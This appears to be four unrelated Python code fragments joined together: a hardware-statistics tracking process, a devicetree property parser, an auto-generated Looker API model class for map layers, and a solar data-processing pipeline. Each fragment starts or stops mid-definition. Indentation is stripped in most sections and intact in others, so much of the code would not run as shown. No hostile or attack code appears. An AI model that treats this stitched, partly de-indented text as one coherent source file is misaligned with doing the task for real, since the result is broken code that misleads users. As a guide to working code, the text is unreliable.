track_network_stats
]
all_processors = hardware_processors + generic_processors
return all_processors
def _exit(self, signnum: str, frame) -> None:
""" Exit signal to terminate system tracking
Args:
signame (str): Signal recieved
"""
signame = signal.Signals(signnum).name
self.synlog.info(
f"Signal {signame} of code {signnum} on {frame} has been received.",
signame=signame,
signnum=signnum
)
# Zero is considered “successful termination” and any nonzero value is
# considered “abnormal termination” by shells and the like.
self.synlog.info("Sysmetric operations stopped.")
sys.exit(0)
def _probe(
self,
resolution: int = 1,
descriptors: Dict[str, str] = {},
) -> None:
""" Polls and logs hardware statistics in the background at a specified
regular interval. Current statistics supported include:
1) CPU load percentage
2) Memory total
3) Memory available
4) Memory used
5) Memory free
6) Disk read count
7) Disk write count
8) Disk read bytes
9) Disk write bytes
10) Network bytes sent
11) Network bytes receieved
12) Network packets sent
13) Network packets receieved
Args:
resolution (int): Polling interval in seconds. Default: 1
descriptors (dict(str, str)): Localisation descriptors identifying
the current running source code segment. Default: {}
"""
self.synlog.info(
"Probed system's hardware usage successfully.",
resolution=resolution,
**descriptors
)
time.sleep(resolution)
##################
# Core Functions #
##################
    def track(
        self,
        file_path: str,
        class_name: str,
        function_name: str,
        resolution: int = 1,
        **kwargs
    ):
        """ Commences periodic polling and logging of hardware stats of the
            current system in a daemonised background process.

        Args:
            file_path (str): Location of the source file that called track()
            class_name (str): Name of the calling class, logged as "ID_class"
            function_name (str): Name of the calling function/method
            resolution (int): Polling interval in seconds. Default: 1
            **kwargs: Extra localisation descriptors merged into every log
        Returns:
            Tracking process (multiprocessing.Process)
        """
        def target(descriptors: Dict[str, str]) -> None:
            """ Triggers periodic probe for hardware statistics, incorporating
                custom localisation descriptors into the logs
            Args:
                descriptors (dict(str, str)): Localisation descriptors
            """
            # Terminate process when one of the following signal is received
            DEFAULT_SIGNALS = ('SIGINT', 'SIGTERM')
            for signame in DEFAULT_SIGNALS:
                signal_code = getattr(signal, signame)
                signal.signal(signal_code, self._exit)

            # Poll forever; only the signal handler (self._exit) ends this
            while True:
                self._probe(resolution=resolution, descriptors=descriptors)

        # initialise() is inherited from RootLogger and presumably builds the
        # underlying logger -- only done when not already tracking
        if not self.is_tracking():
            self.initialise()

        descriptors = {
            "ID_path": file_path,
            "ID_class": class_name,
            "ID_function": function_name,
            **kwargs
        }

        self.tracker = Process(target=target, args=(descriptors,))
        self.tracker.daemon = True  # reaped automatically with the parent
        self.tracker.start()
        return self.tracker
def terminate(self) | |
self.node.dt.filename,
self))
return self.node.dt.phandle2node[int.from_bytes(self.value, "big")]
def to_nodes(self):
"""
Returns a list with the Nodes the phandles in the property point to.
Raises DTError if the property value contains anything other than
phandles. All of the following are accepted:
foo = < >
foo = < &bar >;
foo = < &bar &baz ... >;
foo = < &bar ... >, < &baz ... >;
"""
def type_ok():
if self.type in (TYPE_PHANDLE, TYPE_PHANDLES):
return True
# Also accept 'foo = < >;'
return self.type is TYPE_NUMS and not self.value
if not type_ok():
_err("expected property '{0}' on {1} in {2} to be assigned with "
"'{0} = < &foo &bar ... >;', not '{3}'"
.format(self.name, self.node.path,
self.node.dt.filename, self))
return [self.node.dt.phandle2node[int.from_bytes(self.value[i:i + 4],
"big")]
for i in range(0, len(self.value), 4)]
def to_path(self):
"""
Returns the Node referenced by the path stored in the property.
Raises DTError if the property was not assigned with either of these
syntaxes (has Property.type TYPE_PATH or TYPE_STRING):
foo = &bar;
foo = "/bar";
For the second case, DTError is raised if the path does not exist.
"""
if self.type not in (TYPE_PATH, TYPE_STRING):
_err("expected property '{0}' on {1} in {2} to be assigned with "
"either '{0} = &foo' or '{0} = \"/path/to/node\"', not '{3}'"
.format(self.name, self.node.path, self.node.dt.filename,
self))
try:
path = self.value.decode("utf-8")[:-1]
except UnicodeDecodeError:
_err("value of property '{}' ({}) on {} in {} is not valid UTF-8"
.format(self.name, self.value, self.node.path,
self.node.dt.filename))
try:
return self.node.dt.get_node(path)
except DTError:
_err("property '{}' on {} in {} points to the non-existent node "
"\"{}\"".format(self.name, self.node.path,
self.node.dt.filename, path))
    @property
    def type(self):
        """
        See the class docstring.

        Classifies the value into one of the TYPE_* constants based on the
        sequence of markers recorded while the value was parsed. NOTE: the
        order of the checks below matters -- the exact-list comparisons must
        run before the set-based fallbacks that treat multiple blocks
        ('<...>, <...>') the same as one.
        """
        # Data labels (e.g. 'foo = label: <3>') are irrelevant, so filter them
        # out
        types = [marker[1] for marker in self._markers
                 if marker[1] != _REF_LABEL]

        if not types:
            return TYPE_EMPTY

        if types == [_TYPE_UINT8]:
            return TYPE_BYTES

        if types == [_TYPE_UINT32]:
            return TYPE_NUM if len(self.value) == 4 else TYPE_NUMS

        # Treat 'foo = <1 2 3>, <4 5>, ...' as TYPE_NUMS too
        if set(types) == {_TYPE_UINT32}:
            return TYPE_NUMS

        if set(types) == {_TYPE_STRING}:
            return TYPE_STRING if len(types) == 1 else TYPE_STRINGS

        if types == [_REF_PATH]:
            return TYPE_PATH

        # A single 32-bit cell that is a phandle reference
        if types == [_TYPE_UINT32, _REF_PHANDLE] and len(self.value) == 4:
            return TYPE_PHANDLE

        if set(types) == {_TYPE_UINT32, _REF_PHANDLE}:
            # Each phandle contributes exactly 4 bytes to the value
            if len(self.value) == 4*types.count(_REF_PHANDLE):
                # Array with just phandles in it
                return TYPE_PHANDLES
            # Array with both phandles and numbers
            return TYPE_PHANDLES_AND_NUMS

        return TYPE_COMPOUND
    def __str__(self):
        """
        Renders the property as devicetree-source-like text, e.g.
        'label: foo = < 0x1 &bar >, "baz";'. Walks the marker list recorded
        during parsing to decide how each slice of the raw value is printed.
        """
        s = "".join(label + ": " for label in self.labels) + self.name
        if not self.value:
            return s + ";"

        s += " ="
        for i, (pos, marker_type, ref) in enumerate(self._markers):
            if i < len(self._markers) - 1:
                next_marker = self._markers[i + 1]
            else:
                next_marker = None

            # End of current marker
            end = next_marker[0] if next_marker else len(self.value)

            if marker_type is _TYPE_STRING:
                # end - 1 to strip off the null terminator
                s += ' "{}"'.format(_decode_and_escape(
                    self.value[pos:end - 1]))
                if end != len(self.value):
                    s += ","
            elif marker_type is _REF_PATH:
                s += " &" + ref
                if end != len(self.value):
                    s += ","
            else:
                # <> or []
                if marker_type is _REF_LABEL:
                    s += " {}:".format(ref)
                elif marker_type is _REF_PHANDLE:
                    s += " &" + ref
                    pos += 4
                    # Subtle: There might be more data between the phandle and
                    # the next marker, so we can't 'continue' here
                else:  # marker_type is _TYPE_UINT*
                    elm_size = _TYPE_TO_N_BYTES[marker_type]
                    s += _N_BYTES_TO_START_STR[elm_size]

                # NOTE: elm_size deliberately carries over from an earlier
                # _TYPE_UINT* iteration when this marker was a label/phandle
                while pos != end:
                    num = int.from_bytes(self.value[pos:pos + elm_size],
                                         "big")
                    if elm_size == 1:
                        s += " {:02X}".format(num)
                    else:
                        s += " " + hex(num)

                    pos += elm_size

                # Close the '<...>'/'[...]' only when the next marker does not
                # continue the same array
                if pos != 0 and \
                   (not next_marker or
                        next_marker[1] not in (_REF_PHANDLE, _REF_LABEL)):

                    s += _N_BYTES_TO_END_STR[elm_size]
                    if pos != len(self.value):
                        s += ","

        return s + ";"
def __repr__(self):
return "<Property '{}' at '{}' in '{}'>" \
.format(self.name, self.node.path, self.node.dt.filename)
#
# Internal functions
#
def _add_marker(self, marker_type, data=None):
# Helper for registering markers in the value that are processed after
# parsing. See _fixup_props(). 'marker_type' identifies the type of
# marker, and 'data' has any optional data associated with the marker.
# len(self.value) gives the current offset. This function is called
# while the value is built. We use a list instead of a tuple to be able
# to fix up offsets later (they might increase if the value includes
# path references, e.g. 'foo = &bar, <3>;', which are expanded later).
self._markers.append([len(self.value), marker_type, data])
# For phandle references, add a dummy value with the same length as a
# phandle. This is handy for the length check in _register_phandles().
if marker_type is _REF_PHANDLE:
self.value += b"\0\0\0\0"
#
# Public functions
#
def to_num(data, length=None, signed=False):
    """
    Converts the 'bytes' array 'data' to a number, interpreting it as
    big-endian (the standard byte order in devicetree).

    length (default: None):
      If given, 'data' must be exactly this many bytes long (a simple type
      check); DTError is raised otherwise. None skips the check.

    signed (default: False):
      If True, interpret the value as signed rather than unsigned.
    """
    _check_is_bytes(data)

    if length is not None:
        _check_length_positive(length)
        actual_len = len(data)
        if actual_len != length:
            _err("{} is {} bytes long, expected {}"
                 .format(data, actual_len, length))

    return int.from_bytes(data, "big", signed=signed)
def to_nums(data, length=4, signed=False):
    """
    Like Property.to_nums(), but takes an arbitrary 'bytes' array. The values
    are assumed to be in big-endian format, which is standard in devicetree.

    length (default: 4):
        Size in bytes of each number; len(data) must be a multiple of it,
        otherwise DTError is raised.

    signed (default: False):
        If True, the values are interpreted as signed rather than unsigned.
    """
    _check_is_bytes(data)
    _check_length_positive(length)

    if len(data) % length:
        # Fixed the doubled word ("a a multiple") in this error message
        _err("{} is {} bytes long, expected a length that's a multiple of {}"
             .format(data, len(data), length))

    return [int.from_bytes(data[i:i + length], "big", signed=signed)
            for i in range(0, len(data), length)]
#
# Public constants
#

# See Property.type. Comments show the source form each constant classifies.
TYPE_EMPTY = 0              # 'foo;'
TYPE_BYTES = 1              # 'foo = [ 01 02 ];'
TYPE_NUM = 2                # 'foo = < 1 >;' (single 32-bit cell)
TYPE_NUMS = 3               # 'foo = < 1 2 3 >;' (one or more cell blocks)
TYPE_STRING = 4             # 'foo = "bar";'
TYPE_STRINGS = 5            # 'foo = "bar", "baz";'
TYPE_PATH = 6               # 'foo = &node;'
TYPE_PHANDLE = 7            # 'foo = < &node >;'
TYPE_PHANDLES = 8           # 'foo = < &a &b >;'
TYPE_PHANDLES_AND_NUMS = 9  # 'foo = < &a 1 &b 2 >;'
TYPE_COMPOUND = 10          # anything not matched above
def _check_is_bytes(data):
if not isinstance(data, bytes):
_err("'{}' has type '{}', expected 'bytes'"
.format(data, type(data).__name__))
def _check_length_positive(length):
if length < 1:
_err("'length' must be greater than zero, was " + str(length))
def _append_no_dup(lst, elm):
# Appends 'elm' to 'lst', but only if it isn't already in 'lst'. Lets us
# preserve order, which a set() doesn't.
if elm not in lst:
lst.append(elm)
def _decode_and_escape(b):
    # Decodes the 'bytes' array 'b' as UTF-8 and backslash-escapes special
    # characters.
    #
    # The encode/decode round trip below is a hacky-but-robust way to avoid
    # double-escaping backslashes emitted by 'backslashreplace':
    # bytes.translate() can only map to single bytes, but str.translate()
    # can map one character to many, which is what _escape_table needs.
    decoded = b.decode("utf-8", "surrogateescape")
    escaped = decoded.translate(_escape_table)
    round_tripped = escaped.encode("utf-8", "surrogateescape")
    return round_tripped.decode("utf-8", "backslashreplace")
def _root_and_path_to_node(cur, path, fullpath):
    # Resolves 'path' relative to the Node 'cur': with 'cur' at /foo/bar and
    # path "baz/qaz", the node at /foo/bar/baz/qaz is returned. 'fullpath' is
    # the path exactly as written in the .dts file, used in error messages.
    for part in path.split("/"):
        # Empty parts come from '//' runs or a trailing '/'; skip them
        if not part:
            continue

        if part not in cur.nodes:
            _err("component '{}' in path '{}' does not exist"
                 .format(part, fullpath))

        cur = cur.nodes[part]

    return cur
def _err(msg):
    # Central error helper: every parse/lookup failure in this module is
    # reported as a DTError carrying the given message
    raise DTError(msg)
# str.translate() table mapping special characters to their backslash-escaped
# spellings; used by _decode_and_escape()
_escape_table = str.maketrans({
    "\\": "\\\\",
    '"': '\\"',
    "\a": "\\a",
    "\b": "\\b",
    "\t": "\\t",
    "\n": "\\n",
    "\v": "\\v",
    "\f": "\\f",
    "\r": "\\r"})
class DTError(Exception):
    """Exception raised for devicetree-related errors."""
# Token produced by the lexer: 'id' is the token kind, 'val' its text/value
_Token = collections.namedtuple("Token", "id val")

# Lexer states
_DEFAULT = 0
_EXPECT_PROPNODENAME = 1
_EXPECT_BYTE = 2

# Decimal or hex number literal with optional C-style U/L suffixes
_num_re = re.compile(r"(0[xX][0-9a-fA-F]+|[0-9]+)(?:ULL|UL|LL|U|L)?")

# A leading \ is allowed property and node names, probably to allow weird node
# names that would clash with other stuff
_propnodename_re = re.compile(r"\\?([a-zA-Z0-9,._+*#?@-]+)")

# Misc. tokens that are tried after a property/node name. This is important, as
# there's overlap with the allowed characters in names. Multi-character
# operators are listed before their prefixes so the alternation prefers them.
_misc_re = re.compile(
    "|".join(re.escape(pat) for pat in (
        "==", "!=", "!", "=", ",", ";", "+", "-", "*", "/", "%", "~", "?", ":",
        "^", "(", ")", "{", "}", "[", "]", "<<", "<=", "<", ">>", ">=", ">",
        "||", "|", "&&", "&")))

# A single byte inside a bytestring literal '[ ... ]'
_byte_re = re.compile(r"[0-9a-fA-F]{2}")
# Matches | |
# coding: utf-8
"""
Experimental Looker API 3.1 Preview
This API 3.1 is in active development. Breaking changes are likely to occur to some API functions in future Looker releases until API 3.1 is officially launched and upgraded to beta status. If you have time and interest to experiment with new or modified services exposed in this embryonic API 3.1, we welcome your participation and feedback! For large development efforts or critical line-of-business projects, we strongly recommend you stick with the API 3.0 while API 3.1 is under construction. # noqa: E501
OpenAPI spec version: 3.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class LookmlModelExploreFieldMapLayer(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'url': 'str',
'feature_key': 'str',
'property_key': 'str',
'property_label_key': 'str',
'projection': 'str',
'format': 'str',
'extents_json_url': 'str',
'max_zoom_level': 'int',
'min_zoom_level': 'int'
}
attribute_map = {
'url': 'url',
'feature_key': 'feature_key',
'property_key': 'property_key',
'property_label_key': 'property_label_key',
'projection': 'projection',
'format': 'format',
'extents_json_url': 'extents_json_url',
'max_zoom_level': 'max_zoom_level',
'min_zoom_level': 'min_zoom_level'
}
def __init__(self, url=None, feature_key=None, property_key=None, property_label_key=None, projection=None, format=None, extents_json_url=None, max_zoom_level=None, min_zoom_level=None): # noqa: E501
"""LookmlModelExploreFieldMapLayer - a model defined in Swagger""" # noqa: E501
self._url = None
self._feature_key = None
self._property_key = None
self._property_label_key = None
self._projection = None
self._format = None
self._extents_json_url = None
self._max_zoom_level = None
self._min_zoom_level = None
self.discriminator = None
if url is not None:
self.url = url
if feature_key is not None:
self.feature_key = feature_key
if property_key is not None:
self.property_key = property_key
if property_label_key is not None:
self.property_label_key = property_label_key
if projection is not None:
self.projection = projection
if format is not None:
self.format = format
if extents_json_url is not None:
self.extents_json_url = extents_json_url
if max_zoom_level is not None:
self.max_zoom_level = max_zoom_level
if min_zoom_level is not None:
self.min_zoom_level = min_zoom_level
    @property
    def url(self):
        """Gets the url of this LookmlModelExploreFieldMapLayer.  # noqa: E501

        URL to the map layer resource.  # noqa: E501

        :return: The url of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :rtype: str
        """
        return self._url

    @url.setter
    def url(self, url):
        """Sets the url of this LookmlModelExploreFieldMapLayer.

        URL to the map layer resource.  # noqa: E501

        :param url: The url of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :type: str
        """
        self._url = url

    @property
    def feature_key(self):
        """Gets the feature_key of this LookmlModelExploreFieldMapLayer.  # noqa: E501

        Specifies the name of the TopoJSON object that the map layer references. If not specified, use the first object.  # noqa: E501

        :return: The feature_key of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :rtype: str
        """
        return self._feature_key

    @feature_key.setter
    def feature_key(self, feature_key):
        """Sets the feature_key of this LookmlModelExploreFieldMapLayer.

        Specifies the name of the TopoJSON object that the map layer references. If not specified, use the first object.  # noqa: E501

        :param feature_key: The feature_key of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :type: str
        """
        self._feature_key = feature_key

    @property
    def property_key(self):
        """Gets the property_key of this LookmlModelExploreFieldMapLayer.  # noqa: E501

        Selects which property from the TopoJSON data to plot against. TopoJSON supports arbitrary metadata for each region. When null, the first matching property should be used.  # noqa: E501

        :return: The property_key of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :rtype: str
        """
        return self._property_key

    @property_key.setter
    def property_key(self, property_key):
        """Sets the property_key of this LookmlModelExploreFieldMapLayer.

        Selects which property from the TopoJSON data to plot against. TopoJSON supports arbitrary metadata for each region. When null, the first matching property should be used.  # noqa: E501

        :param property_key: The property_key of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :type: str
        """
        self._property_key = property_key

    @property
    def property_label_key(self):
        """Gets the property_label_key of this LookmlModelExploreFieldMapLayer.  # noqa: E501

        Which property from the TopoJSON data to use to label the region. When null, property_key should be used.  # noqa: E501

        :return: The property_label_key of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :rtype: str
        """
        return self._property_label_key

    @property_label_key.setter
    def property_label_key(self, property_label_key):
        """Sets the property_label_key of this LookmlModelExploreFieldMapLayer.

        Which property from the TopoJSON data to use to label the region. When null, property_key should be used.  # noqa: E501

        :param property_label_key: The property_label_key of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :type: str
        """
        self._property_label_key = property_label_key

    @property
    def projection(self):
        """Gets the projection of this LookmlModelExploreFieldMapLayer.  # noqa: E501

        The preferred geographic projection of the map layer when displayed in a visualization that supports multiple geographic projections.  # noqa: E501

        :return: The projection of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :rtype: str
        """
        return self._projection

    @projection.setter
    def projection(self, projection):
        """Sets the projection of this LookmlModelExploreFieldMapLayer.

        The preferred geographic projection of the map layer when displayed in a visualization that supports multiple geographic projections.  # noqa: E501

        :param projection: The projection of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :type: str
        """
        self._projection = projection

    @property
    def format(self):
        """Gets the format of this LookmlModelExploreFieldMapLayer.  # noqa: E501

        Specifies the data format of the region information. Valid values are: \"topojson\", \"vector_tile_region\".  # noqa: E501

        :return: The format of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :rtype: str
        """
        return self._format

    @format.setter
    def format(self, format):
        """Sets the format of this LookmlModelExploreFieldMapLayer.

        Specifies the data format of the region information. Valid values are: \"topojson\", \"vector_tile_region\".  # noqa: E501

        :param format: The format of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :type: str
        """
        self._format = format

    @property
    def extents_json_url(self):
        """Gets the extents_json_url of this LookmlModelExploreFieldMapLayer.  # noqa: E501

        Specifies the URL to a JSON file that defines the geographic extents of each region available in the map layer. This data is used to automatically center the map on the available data for visualization purposes. The JSON file must be a JSON object where the keys are the mapping value of the feature (as specified by property_key) and the values are arrays of four numbers representing the west longitude, south latitude, east longitude, and north latitude extents of the region. The object must include a key for every possible value of property_key.  # noqa: E501

        :return: The extents_json_url of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :rtype: str
        """
        return self._extents_json_url

    @extents_json_url.setter
    def extents_json_url(self, extents_json_url):
        """Sets the extents_json_url of this LookmlModelExploreFieldMapLayer.

        Specifies the URL to a JSON file that defines the geographic extents of each region available in the map layer. This data is used to automatically center the map on the available data for visualization purposes. The JSON file must be a JSON object where the keys are the mapping value of the feature (as specified by property_key) and the values are arrays of four numbers representing the west longitude, south latitude, east longitude, and north latitude extents of the region. The object must include a key for every possible value of property_key.  # noqa: E501

        :param extents_json_url: The extents_json_url of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :type: str
        """
        self._extents_json_url = extents_json_url
    @property
    def max_zoom_level(self):
        """Gets the max_zoom_level of this LookmlModelExploreFieldMapLayer.  # noqa: E501

        The maximum zoom level that the map layer may be displayed at, for visualizations that support zooming.  # noqa: E501

        :return: The max_zoom_level of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :rtype: int
        """
        return self._max_zoom_level

    @max_zoom_level.setter
    def max_zoom_level(self, max_zoom_level):
        """Sets the max_zoom_level of this LookmlModelExploreFieldMapLayer.

        The maximum zoom level that the map layer may be displayed at, for visualizations that support zooming.  # noqa: E501

        :param max_zoom_level: The max_zoom_level of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :type: int
        """
        self._max_zoom_level = max_zoom_level
    @property
    def min_zoom_level(self):
        """Gets the min_zoom_level of this LookmlModelExploreFieldMapLayer.  # noqa: E501

        The minimum zoom level that the map layer may be displayed at, for visualizations that support zooming.  # noqa: E501

        :return: The min_zoom_level of this LookmlModelExploreFieldMapLayer.  # noqa: E501
        :rtype: int
        """
        return self._min_zoom_level
@min_zoom_level.setter
def min_zoom_level(self, min_zoom_level):
"""Sets the min_zoom_level of this LookmlModelExploreFieldMapLayer.
The maximum zoom level that the map layer may be displayed at, for visualizations | |
# -*- coding: utf-8 -*-
''' Data Handler Module
This module contains a class for managing a data processing pipeline
'''
from time import time
from datetime import timedelta
import numpy as np
import pandas as pd
from scipy.stats import mode, skew
from scipy.interpolate import interp1d
from sklearn.cluster import DBSCAN
import cvxpy as cvx
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
from solardatatools.time_axis_manipulation import make_time_series,\
standardize_time_axis
from solardatatools.matrix_embedding import make_2d
from solardatatools.data_quality import daily_missing_data_advanced
from solardatatools.data_filling import zero_nighttime, interp_missing
from solardatatools.clear_day_detection import find_clear_days
from solardatatools.plotting import plot_2d
from solardatatools.clear_time_labeling import find_clear_times
from solardatatools.solar_noon import avg_sunrise_sunset
from solardatatools.algorithms import CapacityChange, TimeShift, SunriseSunset
class DataHandler():
def __init__(self, data_frame=None, raw_data_matrix=None, datetime_col=None,
convert_to_ts=False, aggregate=None, how=lambda x: x.mean()):
if data_frame is not None:
if convert_to_ts:
data_frame, keys = make_time_series(data_frame)
self.keys = keys
else:
self.keys = list(data_frame.columns)
self.data_frame_raw = data_frame.copy()
if not isinstance(self.data_frame_raw.index, pd.DatetimeIndex):
if datetime_col is not None:
df = self.data_frame_raw
df[datetime_col] = pd.to_datetime(df[datetime_col])
df.set_index(datetime_col, inplace=True)
else:
e = "Data frame must have a DatetimeIndex or"
e += "the user must set the datetime_col kwarg."
raise Exception(e)
df_index = self.data_frame_raw.index
if df_index.tz is not None:
df_index = df_index.tz_localize(None)
self.data_frame = None
if aggregate is not None:
new_data = how(self.data_frame_raw.resample(aggregate))
self.data_frame_raw = new_data
else:
self.data_frame_raw = None
self.data_frame = None
self.keys = None
self.raw_data_matrix = raw_data_matrix
if self.raw_data_matrix is not None:
self.num_days = self.raw_data_matrix.shape[1]
if self.raw_data_matrix.shape[0] <= 1400:
self.data_sampling = int(24 * 60 / self.raw_data_matrix.shape[0])
else:
self.data_sampling = 24 * 60 / self.raw_data_matrix.shape[0]
else:
self.num_days = None
self.data_sampling = None
self.filled_data_matrix = None
self.use_column = None
self.capacity_estimate = None
self.start_doy = None
self.day_index = None
self.power_units = None
# "Extra" data, i.e. additional columns to process from the table
self.extra_matrices = {} # Matrix views of extra columns
self.extra_quality_scores = {} # Relative quality: fraction of non-NaN values in column during daylight time periods, as defined by the main power columns
# Scores for the entire data set
self.data_quality_score = None # Fraction of days without data acquisition errors
self.data_clearness_score = None # Fraction of days that are approximately clear/sunny
# Flags for the entire data set
self.inverter_clipping = None # True if there is inverter clipping, false otherwise
self.num_clip_points = None # If clipping, the number of clipping set points
self.capacity_changes = None # True if the apparent capacity seems to change over the data set
self.normal_quality_scores = None # True if clustering of data quality scores are within decision boundaries
self.time_shifts = None # True if time shifts detected and corrected in data set
self.tz_correction = 0 # TZ correction factor (determined during pipeline run)
# Daily scores (floats), flags (booleans), and boolean masks
self.daily_scores = DailyScores() # 1D arrays of floats
self.daily_flags = DailyFlags() # 1D arrays of Booleans
self.boolean_masks = BooleanMasks() # 2D arrays of Booleans
# Useful daily signals defined by the data set
self.daily_signals = DailySignals()
# Algorithm objects
self.scsf = None
self.capacity_analysis = None
self.time_shift_analysis = None
self.daytime_analysis = None
# Private attributes
self._ran_pipeline = False
self._error_msg = ''
self.__density_lower_threshold = None
self.__density_upper_threshold = None
self.__linearity_threshold = None
self.__recursion_depth = 0
self.__initial_time = None
self.__fix_dst_ran = False
def run_pipeline(self, power_col=None, min_val=-5, max_val=None,
zero_night=True, interp_day=True, fix_shifts=True,
density_lower_threshold=0.6, density_upper_threshold=1.05,
linearity_threshold=0.1, clear_day_smoothness_param=0.9,
clear_day_energy_param=0.8, verbose=True,
start_day_ix=None, end_day_ix=None, c1=None, c2=500.,
solar_noon_estimator='com', correct_tz=True, extra_cols=None,
daytime_threshold=0.1, units='W'):
self.daily_scores = DailyScores()
self.daily_flags = DailyFlags()
self.capacity_analysis = None
self.time_shift_analysis = None
self.extra_matrices = {} # Matrix views of extra columns
self.extra_quality_scores = {}
self.power_units = units
if self.__recursion_depth == 0:
self.tz_correction = 0
t = np.zeros(6)
######################################################################
# Preprocessing
######################################################################
t[0] = time()
if self.data_frame_raw is not None:
self.data_frame = standardize_time_axis(self.data_frame_raw,
timeindex=True,
verbose=verbose)
if self.data_frame is not None:
self.make_data_matrix(power_col, start_day_ix=start_day_ix,
end_day_ix=end_day_ix)
if max_val is not None:
mat_copy = np.copy(self.raw_data_matrix)
mat_copy[np.isnan(mat_copy)] = -9999
slct = mat_copy > max_val
if np.sum(slct) > 0:
self.raw_data_matrix[slct] = np.nan
if min_val is not None:
mat_copy = np.copy(self.raw_data_matrix)
mat_copy[np.isnan(mat_copy)] = 9999
slct = mat_copy < min_val
if np.sum(slct) > 0:
self.raw_data_matrix[slct] = np.nan
self.capacity_estimate = np.nanquantile(self.raw_data_matrix, 0.95)
if self.capacity_estimate <= 500 and self.power_units == 'W':
self.power_units = 'kW'
self.boolean_masks.missing_values = np.isnan(self.raw_data_matrix)
ss = SunriseSunset()
ss.run_optimizer(self.raw_data_matrix, plot=False)
self.boolean_masks.daytime = ss.sunup_mask_estimated
self.daytime_analysis = ss
### TZ offset detection and correction ###
# (1) Determine if there exists a "large" timezone offset error
if power_col is None:
power_col = self.data_frame.columns[0]
if correct_tz:
average_day = np.zeros(self.raw_data_matrix.shape[0])
all_nans = np.alltrue(np.isnan(self.raw_data_matrix), axis=1)
average_day[~all_nans] = np.nanmean(
self.raw_data_matrix[~all_nans, :], axis=1
)
average_day -= np.min(average_day)
average_day /= np.max(average_day)
### Troubleshooting code
# plt.plot(average_day)
# plt.axhline(0.02, color='red', ls='--', linewidth=1)
# plt.show()
meas_per_hour = np.int(60 / self.data_sampling)
cond1 = np.any(average_day[:meas_per_hour] > 0.02)
cond2 = np.any(average_day[-meas_per_hour:] > 0.02)
cond3 = self.__recursion_depth <= 2
if (cond1 or cond2) and cond3:
if verbose:
print(
'Warning: power generation at midnight. Attempting to correct...')
# Catch values that are more than 4 hours from noon and make a
# correction to the time axis (rough correction to avoid days
# rolling over)
rough_noon_est = np.nanmean(
self.data_frame.groupby(pd.Grouper(freq='D')) \
.idxmax()[power_col].dt.time \
.apply(lambda x: 60 * x.hour + x.minute)
) / 60
self.tz_correction = 12 - np.round(rough_noon_est)
self.data_frame.index = self.data_frame.index.shift(
self.tz_correction, freq='H'
)
if verbose:
print('Done.\nRestarting the pipeline...')
self.__recursion_depth += 1
if self.__initial_time is not None:
self.__initial_time = t[0]
self.run_pipeline(
power_col=power_col, min_val=min_val,
max_val=max_val, zero_night=zero_night,
interp_day=interp_day, fix_shifts=fix_shifts,
density_lower_threshold=density_lower_threshold,
density_upper_threshold=density_upper_threshold,
linearity_threshold=linearity_threshold,
clear_day_smoothness_param=clear_day_smoothness_param,
clear_day_energy_param=clear_day_energy_param,
verbose=verbose, start_day_ix=start_day_ix,
end_day_ix=end_day_ix, c1=c1, c2=c2,
solar_noon_estimator=solar_noon_estimator,
correct_tz=correct_tz, extra_cols=extra_cols,
daytime_threshold=daytime_threshold, units=units
)
return
######################################################################
# Cleaning
######################################################################
t[1] = time()
self.make_filled_data_matrix(zero_night=zero_night, interp_day=interp_day)
num_raw_measurements = np.count_nonzero(
np.nan_to_num(self.raw_data_matrix,
copy=True,
nan=0.)[self.boolean_masks.daytime]
)
num_filled_measurements = np.count_nonzero(
np.nan_to_num(self.filled_data_matrix,
copy=True,
nan=0.)[self.boolean_masks.daytime]
)
if num_raw_measurements > 0:
ratio = num_filled_measurements / num_raw_measurements
else:
msg = 'Error: data set contains no non-zero values!'
self._error_msg += '\n' + msg
if verbose:
print(msg)
self.daily_scores = None
self.daily_flags = None
self.data_quality_score = 0.0
self.data_clearness_score = 0.0
self._ran_pipeline = True
return
if ratio < 0.9:
msg = 'Error: data was lost during NaN filling procedure. '
msg += 'This typically occurs when\nthe time stamps are in the '
msg += 'wrong timezone. Please double check your data table.\n'
self._error_msg += '\n' + msg
if verbose:
print(msg)
self.daily_scores = None
self.daily_flags = None
self.data_quality_score = None
self.data_clearness_score = None
self._ran_pipeline = True
return
### TZ offset detection and correction ###
# (2) Determine if there is a "small" timezone offset error
if correct_tz:
average_noon = np.nanmean(
avg_sunrise_sunset(self.filled_data_matrix, threshold=0.01)
)
tz_offset = int(np.round(12 - average_noon))
if tz_offset != 0:
self.tz_correction += tz_offset
# Related to this bug fix:
# https://github.com/slacgismo/solar-data-tools/commit/ae0037771c09ace08bff5a4904475da606e934da
old_index = self.data_frame.index.copy()
self.data_frame.index = self.data_frame.index.shift(
tz_offset, freq='H'
)
self.data_frame = self.data_frame.reindex(index=old_index,
method='nearest',
limit=1).fillna(0)
meas_per_hour = self.filled_data_matrix.shape[0] / 24
roll_by = int(meas_per_hour * tz_offset)
self.filled_data_matrix = np.nan_to_num(
np.roll(self.filled_data_matrix, roll_by, axis=0),
0
)
self.raw_data_matrix = np.roll(
self.raw_data_matrix, roll_by, axis=0
)
self.boolean_masks.daytime = np.roll(
self.boolean_masks.daytime, roll_by, axis=0
)
######################################################################
# Scoring
######################################################################
t[2] = time()
t_clean = np.zeros(6)
t_clean[0] = time()
try:
self.get_daily_scores(threshold=0.2)
except:
